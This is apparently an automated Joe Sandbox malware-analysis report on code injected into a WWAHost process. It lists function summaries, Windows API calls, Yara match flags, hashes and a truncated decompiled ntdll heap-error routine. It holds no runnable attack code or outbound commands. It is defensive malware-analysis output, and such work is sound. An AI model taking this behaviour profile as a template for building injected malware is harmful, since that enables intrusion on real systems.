                                              Uniqueness Score: -1.00%

                                              Function 039995D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: dc6603493ed6290347ae35dafd35974afcc4fb4e895c09d7ebac8b6c09ec7842
                                              • Instruction ID: 39d1553c31d89a13a9c9d8b68e1efba56f09f70a3cb805d4e6515231817c5eb2
                                              • Opcode Fuzzy Hash: dc6603493ed6290347ae35dafd35974afcc4fb4e895c09d7ebac8b6c09ec7842
                                              • Instruction Fuzzy Hash: 1D9002A1202544134105B15D4424616405A97E0245B91C121E10045D0DCA65889171A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03999540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 104604edd66ca90aa30e6933498fdcc53f76d45a68828f1161fb47a27b358270
                                              • Instruction ID: be726b7c634f767f08d07b0d6e18c290e3cdc61ee29b1d42ade66573e3d2dc06
                                              • Opcode Fuzzy Hash: 104604edd66ca90aa30e6933498fdcc53f76d45a68828f1161fb47a27b358270
                                              • Instruction Fuzzy Hash: AC900265211544130105E55D0714507009697D5395391C121F1005590CDB61886161A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00A79030 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 297 a79030-a7905f 298 a7906b-a79072 297->298 299 a79066 call a7be60 297->299 300 a7914c-a79152 298->300 301 a79078-a790c8 call a7bf30 call a6a130 call a75a90 298->301 299->298 308 a790d0-a790e1 Sleep 301->308 309 a79146-a7914a 308->309 310 a790e3-a790e9 308->310 309->300 309->308 311 a79113-a79133 310->311 312 a790eb-a79111 call a78c60 310->312 313 a79139-a7913c 311->313 314 a79134 call a78e60 311->314 312->313 313->309 314->313
                                              APIs
                                              • Sleep.KERNELBASE(000007D0), ref: 00A790D8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep
                                              • String ID: net.dll$wininet.dll
                                              • API String ID: 3472027048-1269752229
                                              • Opcode ID: 1952a26a3df1b054f6ee6da639247102e8fecb388e01e2eecf6dae1e40aef123
                                              • Instruction ID: 07778cdb0c19bef554fddff1e4edf09f2745f57579670fecd9c108f82017eae9
                                              • Opcode Fuzzy Hash: 1952a26a3df1b054f6ee6da639247102e8fecb388e01e2eecf6dae1e40aef123
                                              • Instruction Fuzzy Hash: 5A316EB2602605ABD725DF64CCA5FA7B7B8BF48700F10C11DF61E9B241D770A555CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00A79027 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 80sleepCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 317 a79027-a79072 call a7be60 320 a7914c-a79152 317->320 321 a79078-a790c8 call a7bf30 call a6a130 call a75a90 317->321 328 a790d0-a790e1 Sleep 321->328 329 a79146-a7914a 328->329 330 a790e3-a790e9 328->330 329->320 329->328 331 a79113-a79133 330->331 332 a790eb-a79111 call a78c60 330->332 333 a79139-a7913c 331->333 334 a79134 call a78e60 331->334 332->333 333->329 334->333
                                              APIs
                                              • Sleep.KERNELBASE(000007D0), ref: 00A790D8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep
                                              • String ID: net.dll$wininet.dll
                                              • API String ID: 3472027048-1269752229
                                              • Opcode ID: 1e5e11978888fdf192f27ff0a3c99c9a52a3ef018a1ad1907661bdacdffe2119
                                              • Instruction ID: 67725a25ec444472670b8c0b479f797af6723c65c7c487d1af6f64a8883f3641
                                              • Opcode Fuzzy Hash: 1e5e11978888fdf192f27ff0a3c99c9a52a3ef018a1ad1907661bdacdffe2119
                                              • Instruction Fuzzy Hash: 69217EB1602705ABD711DF64CDA5FABB7B8BF48704F10C12AF61D9B281D370A555CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00A67678 Relevance: 3.1, APIs: 2, Instructions: 58threadwindowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 337 a67678-a6768f 339 a67698-a676ca call a7cb60 call a6a130 call a75a90 337->339 340 a67693 call a7bf80 337->340 347 a676fe-a67702 339->347 348 a676cc-a676de PostThreadMessageW 339->348 340->339 349 a676e0-a676fb call a69890 PostThreadMessageW 348->349 350 a676fd 348->350 349->350 350->347
                                              APIs
                                              • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 00A676DA
                                              • PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 00A676FB
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID:
                                              • API String ID: 1836367815-0
                                              • Opcode ID: 32befdd14b38229857358e5529e361a2c698d7806fb19add9150de854d7301a1
                                              • Instruction ID: 588990f17d1fcabfbffb1feb452513ace4b040081d2517c3b8d924c09cba2ac4
                                              • Opcode Fuzzy Hash: 32befdd14b38229857358e5529e361a2c698d7806fb19add9150de854d7301a1
                                              • Instruction Fuzzy Hash: 3301F531A901297AE720A794DC82FFE776CAF45F51F144119FB04BA1C0DBA46A0687E5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00A67680 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 00A676DA
                                              • PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 00A676FB
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID:
                                              • API String ID: 1836367815-0
                                              • Opcode ID: f67bdee04b0330a795eed618edd43cb063c8381520ef137713398ea470945c68
                                              • Instruction ID: beb83353fa3639ad51a03cbbc68b2fc285d0a9b749861c8272b235f51e1bd239
                                              • Opcode Fuzzy Hash: f67bdee04b0330a795eed618edd43cb063c8381520ef137713398ea470945c68
                                              • Instruction Fuzzy Hash: 0401F231A8022876E720A6A48D43FBE776C9B00F50F048118FF08BA1C1EBE4790647FA
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00A7A68D Relevance: 1.6, APIs: 1, Instructions: 56processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 563 a7a68d-a7a68e 564 a7a676-a7a68c call a7af60 563->564 565 a7a690-a7a6aa call a7af60 563->565 569 a7a6af-a7a6e8 CreateProcessInternalW 565->569
                                              APIs
                                              • CreateProcessInternalW.KERNELBASE(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,?,?,?,?), ref: 00A7A6E4
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateInternalProcess
                                              • String ID:
                                              • API String ID: 2186235152-0
                                              • Opcode ID: 6b4f56487060f96ac5e4c201276da682e2efd5f52a82f2f9f59fdc161e086afd
                                              • Instruction ID: 41a6c07b8986b7593f1df9c1739f31612926342c3020b3d767c294c2b08856d4
                                              • Opcode Fuzzy Hash: 6b4f56487060f96ac5e4c201276da682e2efd5f52a82f2f9f59fdc161e086afd
                                              • Instruction Fuzzy Hash: 86010EB2200208BBCB14DF98DC80DEB77ADEF8C754F15C248FA0CA7241C630E9518BA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00A6A130 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 577 a6a130-a6a14c 578 a6a154-a6a159 577->578 579 a6a14f call a7cdb0 577->579 580 a6a15f-a6a16d call a7d1d0 578->580 581 a6a15b-a6a15e 578->581 579->578 584 a6a16f-a6a17a call a7d450 580->584 585 a6a17d-a6a18e call a7b500 580->585 584->585 590 a6a1a7-a6a1aa 585->590 591 a6a190-a6a1a4 LdrLoadDll 585->591 591->590
                                              APIs
                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00A6A1A2
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Load
                                              • String ID:
                                              • API String ID: 2234796835-0
                                              • Opcode ID: 14d9637ae75740dab2169e9387d270c154b89039a09ccd4394a8d994bcbcbc66
                                              • Instruction ID: 9f4aa99b38a653bde496138861a3862a90eabbaaf3e7cea8e8a613e23e23ba96
                                              • Opcode Fuzzy Hash: 14d9637ae75740dab2169e9387d270c154b89039a09ccd4394a8d994bcbcbc66
                                              • Instruction Fuzzy Hash: E3011EB5E0020DABDB10DBA4DD42FDDB7B89F54308F0082A5A91DA7241F671EB14CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00A7A690 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 603 a7a690-a7a6e8 call a7af60 CreateProcessInternalW
                                              APIs
                                              • CreateProcessInternalW.KERNELBASE(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,?,?,?,?), ref: 00A7A6E4
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateInternalProcess
                                              • String ID:
                                              • API String ID: 2186235152-0
                                              • Opcode ID: 876076b5dbb47a892ddfedc491b322af51d313241269a642b7957940f7f79bb3
                                              • Instruction ID: b47590f9b8e9104a2697cf212d0fe476a6245dcc88ec0ea0e3e33c43d7de8229
                                              • Opcode Fuzzy Hash: 876076b5dbb47a892ddfedc491b322af51d313241269a642b7957940f7f79bb3
                                              • Instruction Fuzzy Hash: F601B2B2210108BFCB54DF89DC80EEB77ADAF8C754F118258FA0D97241C630E851CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00A79160 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00A6D2E0,?,?), ref: 00A7919C
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateThread
                                              • String ID:
                                              • API String ID: 2422867632-0
                                              • Opcode ID: 2b72e38545c6b1a77ed511e54550852098506dab51eee5d0e60a26b419388c25
                                              • Instruction ID: 59ed14cbe022601298dae1a5947eac81e6c72e727390ed07e707359958fd62d4
                                              • Opcode Fuzzy Hash: 2b72e38545c6b1a77ed511e54550852098506dab51eee5d0e60a26b419388c25
                                              • Instruction Fuzzy Hash: 6EE06D337803143AE22061A99C02FA7B38CDB80B61F54813AFA0DEB2C1D591F90102A4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00A7A612 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 00A7A64D
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID:
                                              • API String ID: 3298025750-0
                                              • Opcode ID: 3eb0e80f9e804458ffad518fcaa2a2d19d3c3b9b34952f36cdb6bf968c08d30d
                                              • Instruction ID: 6303f467028bed4bf351a09b3741bfab837d4418a55a2ce860d4e666bf36f92f
                                              • Opcode Fuzzy Hash: 3eb0e80f9e804458ffad518fcaa2a2d19d3c3b9b34952f36cdb6bf968c08d30d
                                              • Instruction Fuzzy Hash: FCF06DB5600208BFDB28DF59DD46EEB37A8EF84350F208159F90EA7251CA30E910CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00A7A5E0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlAllocateHeap.NTDLL(00A75176,?,00A758EF,00A758EF,?,00A75176,?,?,?,?,?,00000000,00000005,00000206), ref: 00A7A60D
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 4eeee5f58efdf21d171fa9f1326e000b1994929843c0f345beb3c8c7aaa15deb
                                              • Instruction ID: ca965ebc542fc73ff43e237b472de253036d4602011c26237265aa428d6a5f3a
                                              • Opcode Fuzzy Hash: 4eeee5f58efdf21d171fa9f1326e000b1994929843c0f345beb3c8c7aaa15deb
                                              • Instruction Fuzzy Hash: 01E012B1200208ABDB14EF89DC85EAB37ACEF88654F118158FA085B242CA30F9108AB1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00A7A620 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 00A7A64D
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID:
                                              • API String ID: 3298025750-0
                                              • Opcode ID: a1f7dc8e7f53a3f8249f2c6d0a6452cc2d574f3e67fea06934ffed66e3b82adc
                                              • Instruction ID: dda598d7d3f275c4ff0e19fe78b5405ffb078ce9326ea2cbb3970a71ce3bd8fc
                                              • Opcode Fuzzy Hash: a1f7dc8e7f53a3f8249f2c6d0a6452cc2d574f3e67fea06934ffed66e3b82adc
                                              • Instruction Fuzzy Hash: CCE012B1200208ABDB14EF89DC49EAB37ACEF88750F118158FA0C5B242C630E9108AB1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00A7A780 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                              Download Yara Rule
                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,00A6D5B2,00A6D5B2,?,00000000,?,?), ref: 00A7A7B0
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LookupPrivilegeValue
                                              • String ID:
                                              • API String ID: 3899507212-0
                                              • Opcode ID: 1603bad059ca15678eb2c8229aefeef34436a6a2ffabd18c43c9bb13eb52ef96
                                              • Instruction ID: 2a4de8d48c38aff11ce4ee3661959f1a787a3b04b31ace4e066eadd01511026a
                                              • Opcode Fuzzy Hash: 1603bad059ca15678eb2c8229aefeef34436a6a2ffabd18c43c9bb13eb52ef96
                                              • Instruction Fuzzy Hash: 3AE01AB12002087BDB10DF49CC45EE737ADEF89654F118154FA0C57241C530E8148AB1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00A6DA17 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetErrorMode.KERNELBASE(00008003,?,?,00A68233,?), ref: 00A6DA4B
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0
                                              • Opcode ID: ce7fbc4bbb014646b639d4b1b2d684765decd5df623d996ba46e737454f497d0
                                              • Instruction ID: bfcb30ee8987514bfef2455954d0cd594f0c79160546820ad8c87b0c5accea81
                                              • Opcode Fuzzy Hash: ce7fbc4bbb014646b639d4b1b2d684765decd5df623d996ba46e737454f497d0
                                              • Instruction Fuzzy Hash: 99E02B71754300A6F720DBA08C42FA73698AF8C780F0840E4FC4DDB3C3E670E0208218
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00A6DA20 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetErrorMode.KERNELBASE(00008003,?,?,00A68233,?), ref: 00A6DA4B
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0
                                              • Opcode ID: a714ccd9be1f095c3c74df8391fc4f48c6866eedcca8de211dbdf4dcb0402e58
                                              • Instruction ID: 3ff20b43eada17837a7d2a561e8c84a9779b882bd43b1e1169df0133215de312
                                              • Opcode Fuzzy Hash: a714ccd9be1f095c3c74df8391fc4f48c6866eedcca8de211dbdf4dcb0402e58
                                              • Instruction Fuzzy Hash: A9D05E71A4430427E610E6E48C47F2636989B88A80F058074F909DA2C2EAA0E4004164
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0399967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: b2e39d327a4436d2e4780fe46fb852ac39c7ec4131807e9542809468ece265d1
                                              • Instruction ID: bd85f93994a4777efc6dc7b4c1595ae25f85cac7a0f342b9ac20fe68d541031b
                                              • Opcode Fuzzy Hash: b2e39d327a4436d2e4780fe46fb852ac39c7ec4131807e9542809468ece265d1
                                              • Instruction Fuzzy Hash: E2B09B719015C5D5FA11E7694608717795477D0745F56C156D1020681A4778C091F5F5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Function 03A0B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Strings
                                              • The resource is owned shared by %d threads, xrefs: 03A0B37E
                                              • The critical section is owned by thread %p., xrefs: 03A0B3B9
                                              • *** enter .exr %p for the exception record, xrefs: 03A0B4F1
                                              • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 03A0B314
                                              • *** then kb to get the faulting stack, xrefs: 03A0B51C
                                              • The resource is owned exclusively by thread %p, xrefs: 03A0B374
                                              • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 03A0B2DC
                                              • read from, xrefs: 03A0B4AD, 03A0B4B2
                                              • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 03A0B476
                                              • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 03A0B39B
                                              • <unknown>, xrefs: 03A0B27E, 03A0B2D1, 03A0B350, 03A0B399, 03A0B417, 03A0B48E
                                              • Go determine why that thread has not released the critical section., xrefs: 03A0B3C5
                                              • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 03A0B47D
                                              • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 03A0B305
                                              • an invalid address, %p, xrefs: 03A0B4CF
                                              • *** A stack buffer overrun occurred in %ws:%s, xrefs: 03A0B2F3
                                              • The instruction at %p referenced memory at %p., xrefs: 03A0B432
                                              • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 03A0B53F
                                              • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 03A0B3D6
                                              • write to, xrefs: 03A0B4A6
                                              • This failed because of error %Ix., xrefs: 03A0B446
                                              • *** enter .cxr %p for the context, xrefs: 03A0B50D
                                              • *** An Access Violation occurred in %ws:%s, xrefs: 03A0B48F
                                              • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 03A0B323
                                              • a NULL pointer, xrefs: 03A0B4E0
                                              • *** Inpage error in %ws:%s, xrefs: 03A0B418
                                              • *** Resource timeout (%p) in %ws:%s, xrefs: 03A0B352
                                              • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 03A0B484
                                              • The instruction at %p tried to %s , xrefs: 03A0B4B6
                                              • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 03A0B38F
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                              • API String ID: 0-108210295
                                              • Opcode ID: 9dfc65ff1d151a91be903cdbf834ce1df4c1305775ba11af52d1a8a75ba4f2fa
                                              • Instruction ID: 19addf85b95d92484b0348659e7021bdaf3f531f30f8ca09f43a75e618512352
                                              • Opcode Fuzzy Hash: 9dfc65ff1d151a91be903cdbf834ce1df4c1305775ba11af52d1a8a75ba4f2fa
                                              • Instruction Fuzzy Hash: DD81127DA41310FFCB22DB19AD95D6F3B35AF9AB55B05008AF0142F193D3A2C511DAB2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03A11C06 Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 44%
                                              			E03A11C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x39348a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0395B150();
				} else {
					E0395B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x3a4589c);
				E0395B150("Heap error detected at %p (heap handle %p)\n",  *0x3a458a0);
				_t27 =  *0x3a45898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M03A11E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0395B150();
				} else {
					E0395B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0395B150("Error code: %d - %s\n",  *0x3a45898);
				_t113 =  *0x3a458a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0395B150();
					} else {
						E0395B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0395B150("Parameter1: %p\n",  *0x3a458a4);
				}
				_t115 =  *0x3a458a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0395B150();
					} else {
						E0395B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0395B150("Parameter2: %p\n",  *0x3a458a8);
				}
				_t117 =  *0x3a458ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0395B150();
					} else {
